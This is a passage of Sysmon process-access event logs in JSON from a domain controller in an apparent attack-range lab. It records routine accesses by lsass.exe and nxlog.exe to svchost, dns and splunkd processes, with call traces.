C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:34.192","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:34.192\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:34.192","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:34.911\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:34.911","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:35.926\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:35.926","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:36.942\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:36.942","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:37.957\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:37.957","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:38.723\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nTargetProcessId: 2636\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:38.723","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001027C70200}","TargetProcessId":"2636","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
